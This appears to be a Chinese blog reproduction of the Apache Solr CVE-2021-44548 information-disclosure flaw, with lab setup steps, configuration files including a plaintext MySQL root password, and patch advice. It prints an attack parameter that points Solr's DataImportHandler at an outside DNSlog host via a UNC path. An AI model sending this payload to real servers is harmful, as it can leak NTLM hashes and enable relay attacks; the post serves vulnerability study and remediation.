CVE-2021-44548:Apache Solr 敏感信息泄露漏洞

最新推荐文章于 2024-06-18 10:34:08 发布
最新推荐文章于 2024-06-18 10:34:08 发布
阅读量359 收藏
点赞数
分类专栏: 漏洞复现及利用 文章标签: solr apache lucene
原文链接:https://mp.weixin.qq.com/s/GoPVpThhi4sPgfnOQNIe4w
版权

0x01 漏洞概述


 

Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。

2021年12月18日,Apache发布安全公告,Apache Solr中存在一个信息泄露漏洞(CVE-2021-44548),该漏洞影响了8.11.1之前的所有Apache Solr版本(仅影响Windows平台)。Apache Solr的DataImportHandler中存在一个不正确的输入验证漏洞,可利用Windows UNC路径从Solr主机调用网络上的另一台主机的SMB服务,或导致SMB攻击,从而造成:

  • 敏感数据泄露,如系统用户哈希(NTLM/LM哈希);

  • 在系统配置错误的情况下,SMB中继攻击可能导致用户在SMB共享中被冒充,或导致远程代码执行。

0x02 影响版本


 

Apache Solr < 8.11.1 (仅Windows)
 

0x03 环境搭建


 

Solr漏洞环境下载地址:

https://archive.apache.org/dist/lucene/solr/8.11.0/solr-8.11.0.zip

1)打开命令行,进入bin目录下,运行solr.cmd start

2)再另一个命令行面板中执行solr.cmd create_core -c new_core

3)然后在solr-8.11.0\dist目录中添加三个jar包:

wget https://mirror.shileizcc.com/Solr/mysql-connector-java-5.1.42-bin.jar

wget https://mirror.shileizcc.com/Solr/solr-dataimporthandler-7.3.1.jar

wget https://mirror.shileizcc.com/Solr/solr-dataimporthandler-extras-7.3.1.jar

4)在solr-8.11.0\server\solr\core1\conf\solrconfig.xml中添加DataImportHandler路由

 <requestHandler name="/dataimport" class="org.apache.solr.handler.dataimport.DataImportHandler">
       <lst name="defaults">
         <str name="config">data-config.xml</str>
       </lst>
     </requestHandler>
     <lib dir="C:/Users/Administrator/Downloads/solr-8.11.0/dist/" regex="mysql-connector-java-5.1.42-bin.jar" />
     <lib dir="C:/Users/Administrator/Downloads/solr-8.11.0/contrib/dataimporthandler/lib" regex=".*\.jar" />
     <lib dir="C:/Users/Administrator/Downloads/solr-8.11.0/contrib/dataimporthandler-extras/lib" regex=".*\.jar" />
     <lib dir="C:/Users/Administrator/Downloads/solr-8.11.0/dist/" regex="solr-dataimporthandler.*\.jar" />

 5)在C:\Users\Administrator\Downloads\solr-8.11.0\server\solr\core1\conf目录下新建data-config.xml文件,内容如下:

<dataConfig>
  <dataSource type="JdbcDataSource"
              driver="com.mysql.jdbc.Driver"
              convertType="true"
              url="jdbc:mysql://192.168.110.179:3306/test"
              user="root"
              password="Lifeng716.."/>
  <document>
    <entity name="entity" query="SELECT id, title, content, tags FROM test_table" >
    </entity>
  </document>
</dataConfig>

 6)重新启动solr

0x04 漏洞复现

点击reload后抓包,请求信息如下:

 

在请求url中添加参数
expandMacros=false&config=\\rxtszi.dnslog.cn\aaa
发送请求:

 

 

Dnslog收到请求

总结:该漏洞允许本地计算机通过\\格式路径访问其他开启了SMB服务的机器

0x05 修复方式

目前此漏洞已经修复,建议受影响用户升级到Apache Solr 8.11.1。

下载链接:

https://solr.apache.org/downloads.html

缓解措施:

确保只有受信任的客户端才能向Solr的DataImporthandler发出请求。

王志德发
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
敏感信息泄露
记录并分享学习安全的知识点..
03-19 3637
目录 一、概述 二、分类 (一)软件敏感信息泄露 1.操作系统版本——两种Windows和linux不同的版本号 2.中间件类型 ​3. 版本 Web程序(cms类型及版本、敏感文件 (二)Web敏感信息 1.phpinfo()信息泄露 2.常见编辑器漏洞 3.版本管理工具文件信息泄漏 4.HTTP认证泄漏漏洞 5.管理后台地址泄漏 6.泄漏员工邮箱、分机号码泄漏邮箱及分机号码可被社工,也可生成字典 7.错误页面暴漏信息-——面熟sql错误、php错误、暴漏cms版本等 ...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
敏感信息泄露漏洞
qq_44484541的博客
04-06 1412
敏感信息(也称作敏感数据)是指由权威机构确定的必须受保护的信息。不当使用或未经授权被人接触或修改后,会产生不利于国家和组织的负面影响和利益损失,或不利于个人依法享有的个人隐私的所有信息敏感信息根据其信息种类的不同,可大致分为个人敏感信息、商业敏感信息、国家的敏感信息
Web安全基础学习:敏感信息泄露漏洞之系统信息泄露
qq_51862722的博客
06-18 1262
系统信息泄露漏洞:指在软件系统、网络交互、数据存储或传输过程中,由于安全控制不当导致与系统配置、运行环境相关的信息被非授权访问或公开。这类信息通常包括服务器软件版本、操作系统类型、网络配置、数据库信息等。攻击者可以利用这些信息进行更精准的攻击,比如针对特定版本的软件利用已知漏洞
ToolJet 敏感信息泄露漏洞CVE-2022-23067)
murphysec的博客
05-19 763
CVE-2022-28181 漏洞是由于ToolJet中token泄露,导致用户账户易被攻击者访问。该漏洞影响范围小。官方已发布补丁。 编号      CVE-2022-23067 标题 ToolJet 敏感信息泄露漏洞 描述 ToolJet 是一个开源的低代码框架,可以快速构建和部署内部工具。ToolJet 版本 v0.5.0 到 v1.2.2 容易受到通过 Referer 标头导致帐户接管的token泄漏。如果用户打开邀请链接/注册链接,然后单击页面内的任何外部链接,则会泄露引用者
CVE-2019-3394:[Confluence]敏感信息泄露漏洞
公众号shadow sock7
09-03 2088
这次没咋分析: https://mp.weixin.qq.com/s/puRrvfqWFVKvQ0hOoVs8lQ 写了一个poc: https://github.com/shadowsock5/Poc/tree/master/Confluence ,需要修改: url、用户名、密码、你自己的空间名 然后切换payload,改一下数字就行了。 最后confluence是加了一个过滤函数,判断...
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
三、敏感信息泄露漏洞
weixin_46849264的博客
03-01 1830
【代码】敏感信息泄露漏洞
Dir-300敏感信息泄露漏洞
Yale的博客
05-22 508
固件代码审计 将固件压缩包解压 使用binwalk提取 这时当前路径下生产一个新的文件夹 进入squshf文件系统 先对总体情况做个审计,使用firmwalk.sh 因为审计的结果很长,我们将其保存到1.txt 因为telnet经常会出现安全风险,我们可以匹配telnet关机字 去看看第一个telnetd.sh 在该文件中找到了用户名、密码;密码保存在image_sign文件中 去看看 这样我们就得到了telnet的账户和密码。接下来我们研究web层面的漏洞 已知dlink dir-300
敏感信息泄露漏洞实战
tangshuangsss的专栏
01-22 4355
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介由于后台人员的疏忽或者不当的设计,导致不应该被前端用户看到的数据被轻易的访问到。比如: ...
2024年最新敏感信息泄露总结_rabbitmq漏洞,2024年最新成体系化的神级网络安全进阶笔记
2401_84254011的博客
05-06 965
概念:是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。然后在从机上加载so文件,进而进行执行拓展的新命令。
敏感信息泄露漏洞原理以及修复方法
it知识分享 free for nothing..
03-25 2147
敏感信息泄露漏洞原理以及修复方法
Web安全基础学习:敏感信息泄露漏洞之隐私信息泄露
最新发布
qq_51862722的博客
06-18 464
隐私信息泄露漏洞:指在软件系统、网络交互、数据存储或传输过程中,由于安全控制不当导致的个人身份信息(如姓名、地址、身份证号码)、通信记录、财务信息敏感数据的非授权访问或公开。这类泄露可能导致个人隐私被侵犯,甚至身份盗用、财产损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值